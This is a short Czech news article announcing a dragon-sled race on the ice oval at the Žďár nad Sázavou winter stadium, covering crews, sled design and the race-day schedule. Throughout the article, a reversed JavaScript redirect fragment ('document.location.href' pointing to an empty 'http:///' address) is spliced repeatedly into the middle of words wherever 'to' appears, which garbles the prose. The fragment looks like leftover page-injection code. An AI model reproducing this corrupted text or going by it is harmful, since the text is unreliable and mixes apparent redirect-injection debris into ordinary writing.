Rainbow page separator

Dračí saně posviští po rychlobruslařském oválu u stadionu

Středa, 11. ledna 2017

DRAGON BOAT RACE ON ICE 2016

Žďár nad Sázavou / Jako 1. ročník mistrovství Evropy a 3. ročník mistrovství republiky je na sobotu 14. ledna naplánován žďárský unikátní závod dračích saní. Stejně jako loni se uskuteční na bruslařském oválu u žďárského zimního stadionu, který bude pro tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tost pokryt ledem. Soutěž je zároveň zahajovacím závodem Seriálu dračích lodí Vysočiny 2017, do třetího ročníku jedinečné akce amatérských posádek v Evropě i v zámoří, kromě Číny, jak tvrdí organizá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toři z Windsurfing Clubu Velké Dářko, je přihlášeno osmnáct posádek. Organizá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toři stanovili i náhradní termín, pokud by klimatické podmínky závodu nepřály, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to 11. února.
Originální saně s hlavou draka, jež jsou v republice pouze dvoje, jsou určeny pro deset závodníků s odpichovacími holemi a jednoho bubeníka, který „odpichovačům“ udává rytmus. Pojedou na ovále po rovné trase dlouhé s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to metrů.
Začátek závodů je naplánován na půl desá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou dopoledne, o půl hodiny později se uskuteční první rozjížďky. Ukončení závodů bude v 16 hodin a za hodinu poté dojde k vyhlášení výsledků a předání cen. Vyhřívaný party stan má být v provozu až do 19 hodin.